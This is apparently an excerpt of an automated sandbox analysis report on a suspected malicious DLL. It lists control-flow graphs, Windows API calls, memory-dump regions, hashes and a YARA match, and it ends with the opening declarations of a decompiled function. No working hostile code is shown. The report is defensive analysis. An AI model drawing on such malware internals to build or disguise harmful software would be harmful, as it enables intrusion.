                                                                                                                                                                                      control_flow_graph 96 6e9ec98b-6e9ec99c call 6e9ed350 99 6e9ec99e-6e9ec9a4 96->99 100 6e9ec9ad-6e9ec9b4 96->100 99->100 101 6e9ec9a6-6e9ec9a8 99->101 102 6e9ec9b6-6e9ec9b9 100->102 103 6e9ec9c0-6e9ec9d4 dllmain_raw 100->103 104 6e9eca86-6e9eca95 101->104 102->103 105 6e9ec9bb-6e9ec9be 102->105 106 6e9eca7d-6e9eca84 103->106 107 6e9ec9da-6e9ec9eb dllmain_crt_dispatch 103->107 108 6e9ec9f1-6e9ec9f6 call 6e9d1290 105->108 106->104 107->106 107->108 110 6e9ec9fb-6e9eca03 108->110 111 6e9eca2c-6e9eca2e 110->111 112 6e9eca05-6e9eca07 110->112 113 6e9eca35-6e9eca46 dllmain_crt_dispatch 111->113 114 6e9eca30-6e9eca33 111->114 112->111 115 6e9eca09-6e9eca27 call 6e9d1290 call 6e9ec8db dllmain_raw 112->115 113->106 116 6e9eca48-6e9eca7a dllmain_raw 113->116 114->106 114->113 115->111 116->106
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3136044242-0
                                                                                                                                                                                      • Opcode ID: 715505ada279e7b5d304405419338bc298cc3c4d0059db8260d3d1d79207bf0f
                                                                                                                                                                                      • Instruction ID: f0fbcafacfbb65b3f6ee63989ab9c64752cf272abbb6fb27b0f790f6757b627d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 715505ada279e7b5d304405419338bc298cc3c4d0059db8260d3d1d79207bf0f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 28217C72D006A9BFDB538EA5C840AAE3E6DEF85B94B014515FA947F610C331CD418FA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 220 6e9dc2a0-6e9dc2ad GetModuleHandleA 221 6e9dc2bc 220->221 222 6e9dc2af-6e9dc2bb GetProcAddress 220->222
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6E9DC2A5
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6E9DC2B5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • WakeByAddressSingle, xrefs: 6E9DC2AF
                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0, xrefs: 6E9DC2A0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                                                                                                                                                                                      • API String ID: 1646373207-1731903895
                                                                                                                                                                                      • Opcode ID: e005d492f860da8cb7ec06e2a1c5dd74bbbc753f1ea96773e41d2976cd028b80
                                                                                                                                                                                      • Instruction ID: 408ef1a74314adbfc51aaf7a18d5cf7ecc1052934693d08db99894190ab4ea47
                                                                                                                                                                                      • Opcode Fuzzy Hash: e005d492f860da8cb7ec06e2a1c5dd74bbbc753f1ea96773e41d2976cd028b80
                                                                                                                                                                                      • Instruction Fuzzy Hash: 42B092F0A08D016F9E906AF169ACA862A98BFA324230844656A12F9600EA64C444DE29
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 223 6e9dc320-6e9dc32d GetModuleHandleA 224 6e9dc33c 223->224 225 6e9dc32f-6e9dc33b GetProcAddress 223->225
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6E9DC325
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6E9DC335
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
                                                                                                                                                                                      • API String ID: 1646373207-1891578837
                                                                                                                                                                                      • Opcode ID: 3aba0017180609e0f217c2b116be250c61d12af3352bbe88572e3d22a43ab8d7
                                                                                                                                                                                      • Instruction ID: c8d842bfe43e1d4518ee61ff348148929629477a939c88d238032fd17c46cc82
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3aba0017180609e0f217c2b116be250c61d12af3352bbe88572e3d22a43ab8d7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 05B092F0A08D026E9E50AAF179ACA862968BF6324230844606817E9201EA64C040AD29
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 6E9EC821
                                                                                                                                                                                        • Part of subcall function 6E9ECEAD: InitializeSListHead.KERNEL32(6EA2E4A0,6E9EC82B,6EA2AF60,00000010,6E9EC7BC,?,?,?,6E9EC9E4,?,00000001,?,?,00000001,?,6EA2AFA8), ref: 6E9ECEB2
                                                                                                                                                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E9EC88B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3231365870-0
                                                                                                                                                                                      • Opcode ID: b1bfd225bc7204c080f9746695eae44ddbd103a4671297f619b0071c4297550a
                                                                                                                                                                                      • Instruction ID: 2f1e77c4f5914f05a1de217eb78e058bae7a1e8742ac18ad0169b1311c5470a8
                                                                                                                                                                                      • Opcode Fuzzy Hash: b1bfd225bc7204c080f9746695eae44ddbd103a4671297f619b0071c4297550a
                                                                                                                                                                                      • Instruction Fuzzy Hash: A7212932A483819EDB475BF486007DC3F699FA622DF154C19D6D12FAC1CB71C482CEA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 295 3e0207-3e02e8 call 3d8002 call 3ee399 lstrcmpiW
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 003E02E1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                                                      • String ID: (Gt
                                                                                                                                                                                      • API String ID: 1586166983-558867117
                                                                                                                                                                                      • Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
                                                                                                                                                                                      • Instruction ID: eb21e6250121714ad16c60738a88ca9fd39a1a9a6690ccc2ad51e0f7d023c0f3
                                                                                                                                                                                      • Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
                                                                                                                                                                                      • Instruction Fuzzy Hash: FF2166B6E00208FBEF04DFA5CC0A9DEBBB2FB44314F108199E515AA250D7B65A10DF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 300 6e9f475c-6e9f4761 301 6e9f4763-6e9f477b 300->301 302 6e9f477d-6e9f4781 301->302 303 6e9f4789-6e9f4792 301->303 302->303 306 6e9f4783-6e9f4787 302->306 304 6e9f47a4 303->304 305 6e9f4794-6e9f4797 303->305 309 6e9f47a6-6e9f47b3 GetStdHandle 304->309 307 6e9f4799-6e9f479e 305->307 308 6e9f47a0-6e9f47a2 305->308 310 6e9f47fe-6e9f4802 306->310 307->309 308->309 311 6e9f47b5-6e9f47b7 309->311 312 6e9f47e0-6e9f47f2 309->312 310->301 313 6e9f4808-6e9f480b 310->313 311->312 314 6e9f47b9-6e9f47c2 GetFileType 311->314 312->310 315 6e9f47f4-6e9f47f7 312->315 314->312 316 6e9f47c4-6e9f47cd 314->316 315->310 317 6e9f47cf-6e9f47d3 316->317 318 6e9f47d5-6e9f47d8 316->318 317->310 318->310 319 6e9f47da-6e9f47de 318->319 319->310
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 6E9F47A8
                                                                                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 6E9F47BA
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3000768030-0
                                                                                                                                                                                      • Opcode ID: 869d7855fb574d162f07d1bbbd2954157d1269ecc65f07d1bd85ce65f1ada789
                                                                                                                                                                                      • Instruction ID: 72b507b2de9bf132598a59b5760869fdf8980ceb07e1919177a9a7f0d805fc63
                                                                                                                                                                                      • Opcode Fuzzy Hash: 869d7855fb574d162f07d1bbbd2954157d1269ecc65f07d1bd85ce65f1ada789
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D11D371E14B52CEC7708EBE8E94612BA99AF87270B240B1AD4B6D65F1C230D483CF81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 320 6e9ef3b1-6e9ef3b8 call 6e9ef3bf 323 6e9ef3be 320->323 324 6e9f1c23 call 6e9f49ff 320->324 323->324 326 6e9f1c28-6e9f1c2a 324->326 327 6e9f1c2c-6e9f1c33 call 6e9f4a44 326->327 328 6e9f1c34-6e9f1c3b 326->328 327->328 329 6e9f1c5f-6e9f1c66 call 6e9f138d 328->329 330 6e9f1c3d-6e9f1c47 IsProcessorFeaturePresent 328->330 332 6e9f1c4e-6e9f1c5c call 6e9f29e6 330->332 333 6e9f1c49-6e9f1c4c 330->333 332->329 333->332
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,6E9F1E1B,?,?,?,?,00000000,?,00000000,?,?,6E9F4EAE,?,6E9F4D3D,00000000,?), ref: 6E9F1C3F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                      • Opcode ID: 5abe6942102ed282fd76cc9228c35029f22e7b4a7a66985acf454443e7483ea4
                                                                                                                                                                                      • Instruction ID: 8aec5c87d29fb70a3034189a710b6b07dcf379ba72bfb1c7f2270d4f3de88978
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5abe6942102ed282fd76cc9228c35029f22e7b4a7a66985acf454443e7483ea4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 48E04FB1344757E5FA5516F21E26BA6264C1FA6B1CF240815AB28AC0D3EF84C04B8FA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 339 6e9f1c23 call 6e9f49ff 341 6e9f1c28-6e9f1c2a 339->341 342 6e9f1c2c-6e9f1c33 call 6e9f4a44 341->342 343 6e9f1c34-6e9f1c3b 341->343 342->343 344 6e9f1c5f-6e9f1c66 call 6e9f138d 343->344 345 6e9f1c3d-6e9f1c47 IsProcessorFeaturePresent 343->345 347 6e9f1c4e-6e9f1c5c call 6e9f29e6 345->347 348 6e9f1c49-6e9f1c4c 345->348 347->344 348->347
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,6E9F1E1B,?,?,?,?,00000000,?,00000000,?,?,6E9F4EAE,?,6E9F4D3D,00000000,?), ref: 6E9F1C3F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                      • Opcode ID: 6b2a1e56d8b09e86bf8d19581a5fbfc178bc1734093710208ff44225af2e123c
                                                                                                                                                                                      • Instruction ID: a9dae2abde3fa7fb270791a6d10a81913d3c8a85fedbedd06b865208a6ab2b56
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b2a1e56d8b09e86bf8d19581a5fbfc178bc1734093710208ff44225af2e123c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AE086B1344706E1F51516E11E17795264C0FA6B1CF240415AB18AC0D39F84C0478F91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 354 6e9f2c26-6e9f2c31 355 6e9f2c3f-6e9f2c45 354->355 356 6e9f2c33-6e9f2c3d 354->356 358 6e9f2c5e-6e9f2c6f HeapAlloc 355->358 359 6e9f2c47-6e9f2c48 355->359 356->355 357 6e9f2c73-6e9f2c7e call 6e9f1fcf 356->357 363 6e9f2c80-6e9f2c82 357->363 360 6e9f2c4a-6e9f2c51 call 6e9f54dc 358->360 361 6e9f2c71 358->361 359->358 360->357 367 6e9f2c53-6e9f2c5c call 6e9f0e8e 360->367 361->363 367->357 367->358
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000008,?,?,?,6E9F283F,00000001,00000364,?,FFFFFFFF,000000FF,?,?,6E9ECB0C,?,?,6E9EC074), ref: 6E9F2C67
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                      • Opcode ID: 34295021b5e92f4ce4b65b6268977b6786e5ade685058323e2c1b717ce417633
                                                                                                                                                                                      • Instruction ID: 8e47f2d76045de976f5365becaf3153e6d6358986f344d0ef0fb192316cda176
                                                                                                                                                                                      • Opcode Fuzzy Hash: 34295021b5e92f4ce4b65b6268977b6786e5ade685058323e2c1b717ce417633
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BF0E931204966EAEB515EF69915B9B775DDF82770B10C592F824AB184CB30D9038FE0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 370 6e9f22e9-6e9f22f5 371 6e9f2327-6e9f2332 call 6e9f1fcf 370->371 372 6e9f22f7-6e9f22f9 370->372 379 6e9f2334-6e9f2336 371->379 373 6e9f22fb-6e9f22fc 372->373 374 6e9f2312-6e9f2323 HeapAlloc 372->374 373->374 376 6e9f22fe-6e9f2305 call 6e9f54dc 374->376 377 6e9f2325 374->377 376->371 382 6e9f2307-6e9f2310 call 6e9f0e8e 376->382 377->379 382->371 382->374
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,6E9ECB0C,?,?,6E9EC074,00000400,FFFDC801,?,?,00000001), ref: 6E9F231B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                      • Opcode ID: cb60a9ef79f3a6fc1b5292298f35a7ba7ca47847f40903f04bbe3397e8633307
                                                                                                                                                                                      • Instruction ID: 1c14371e5de9f874e4df52b36b9484a2dc4593ffae238ccdca60378746c72ea7
                                                                                                                                                                                      • Opcode Fuzzy Hash: cb60a9ef79f3a6fc1b5292298f35a7ba7ca47847f40903f04bbe3397e8633307
                                                                                                                                                                                      • Instruction Fuzzy Hash: A3E0E571101262DBEB5216E65C0079A764CEF83AA1F014520AC50A72C4DFB0D8438FE1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 385 6e9f228a-6e9f22a0 EnterCriticalSection
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6E9F0ED2,00000000,6EA2B1B8,0000000C,6E9F0E99,?,?,6E9F2C59,?,?,6E9F283F,00000001,00000364,?), ref: 6E9F2299
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CriticalEnterSection
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1904992153-0
                                                                                                                                                                                      • Opcode ID: 704a7fc2245e5099a872400d30b0468b9333c575ae266925040465c36a17f652
                                                                                                                                                                                      • Instruction ID: 6d9c7e9982036f22928929d4f4a4a1320c4ce4a034be62228206df86afd64d38
                                                                                                                                                                                      • Opcode Fuzzy Hash: 704a7fc2245e5099a872400d30b0468b9333c575ae266925040465c36a17f652
                                                                                                                                                                                      • Instruction Fuzzy Hash: 03B09BB2444208578F005595EC4DC457B5C96D15517584061F40DD7511D575E7944598
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                      			E003E91F7() {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				char _v32;
                                                                                                                                                                                      				char _v40;
                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                      				char _v52;
                                                                                                                                                                                      				signed int _v64;
                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                      				signed int _v72;
                                                                                                                                                                                      				signed int _v76;
                                                                                                                                                                                      				signed int _v88;
                                                                                                                                                                                      				char _v92;
                                                                                                                                                                                      				char _v100;
                                                                                                                                                                                      				char _v108;
                                                                                                                                                                                      				char _v112;
                                                                                                                                                                                      				char _v116;
                                                                                                                                                                                      				char _v120;
                                                                                                                                                                                      				char _v124;
                                                                                                                                                                                      				signed int _v128;
                                                                                                                                                                                      				signed int _v132;
                                                                                                                                                                                      				signed int _v136;
                                                                                                                                                                                      				signed int _v140;
                                                                                                                                                                                      				signed int _v144;
                                                                                                                                                                                      				signed int _v148;
                                                                                                                                                                                      				signed int _v152;
                                                                                                                                                                                      				signed int _v156;
                                                                                                                                                                                      				signed int _v160;
                                                                                                                                                                                      				signed int _v164;
                                                                                                                                                                                      				unsigned int _v168;
                                                                                                                                                                                      				signed int _v172;
                                                                                                                                                                                      				unsigned int _v176;
                                                                                                                                                                                      				signed int _v180;
                                                                                                                                                                                      				signed int _v184;
                                                                                                                                                                                      				signed int _v188;
                                                                                                                                                                                      				signed int _v192;
                                                                                                                                                                                      				signed int _v196;
                                                                                                                                                                                      				signed int _v200;
                                                                                                                                                                                      				signed int _v204;
                                                                                                                                                                                      				signed int _v208;
                                                                                                                                                                                      				signed int _v212;
                                                                                                                                                                                      				signed int _v216;
                                                                                                                                                                                      				signed int _v220;
                                                                                                                                                                                      				signed int _v224;
                                                                                                                                                                                      				signed int _v228;
                                                                                                                                                                                      				signed int _v232;
                                                                                                                                                                                      				signed int _v236;
                                                                                                                                                                                      				signed int _v240;
                                                                                                                                                                                      				signed int _v244;
                                                                                                                                                                                      				signed int _v248;
                                                                                                                                                                                      				signed int _v252;
                                                                                                                                                                                      				signed int _v256;
                                                                                                                                                                                      				signed int _v260;
                                                                                                                                                                                      				signed int _v264;
                                                                                                                                                                                      				signed int _v268;
                                                                                                                                                                                      				signed int _v272;
                                                                                                                                                                                      				signed int _v276;
                                                                                                                                                                                      				signed int _v280;
                                                                                                                                                                                      				signed int _v284;
                                                                                                                                                                                      				unsigned int _v288;
                                                                                                                                                                                      				signed int _v292;
                                                                                                                                                                                      				signed int _v296;
                                                                                                                                                                                      				signed int _v300;
                                                                                                                                                                                      				signed int _v304;
                                                                                                                                                                                      				unsigned int _v308;
                                                                                                                                                                                      				signed int _v312;
                                                                                                                                                                                      				signed int _v316;
                                                                                                                                                                                      				signed int _v320;
